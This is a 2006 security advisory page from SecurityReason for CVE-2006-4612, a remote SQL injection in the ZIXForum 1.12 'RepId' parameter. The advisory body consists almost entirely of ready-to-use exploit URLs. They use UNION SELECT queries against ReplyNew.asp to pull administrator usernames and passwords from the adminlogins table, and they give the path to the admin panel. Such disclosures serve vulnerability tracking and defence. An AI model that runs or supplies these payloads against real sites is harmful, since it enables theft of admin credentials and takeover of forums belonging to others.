SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

&copy;ZIXForum 1.12 <= "RepId" Remote SQL Injection


Arrow  SecurityAlert : 1507
Arrow  CVE : CVE-2006-4612
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : ChironeX FleckeriX Gmail Com
Arrow  Published : 08.09.2006

Arrow  Affected Software : &copy;ZIXForum 1.12 <= "RepId"



Arrow  Advisory Content :  

########################################################################
########

##
##

## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection
##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
##

## Credit by | Chironex Fleckeri
##

## Mail | ChironeX.FleckeriX (at) Gmail (dot) Com [email
concealed] ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
##

##
##

########################################################################
########

########################################################################
########################################################################
##########

#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT
null,null,null,J_user,null,null,null,null,null,null,null,null FROM
adminlogins #

########################################################################
########################################################################
##########

########################################################################
########################################################################
##########

#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT
null,null,null,J_pass,null,null,null,null,null,null,null,null FROM
adminlogins #

########################################################################
########################################################################
##########

################################################################

#Admin Panel : http://www.target.com/path/theadmin/default.asp #

################################################################





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.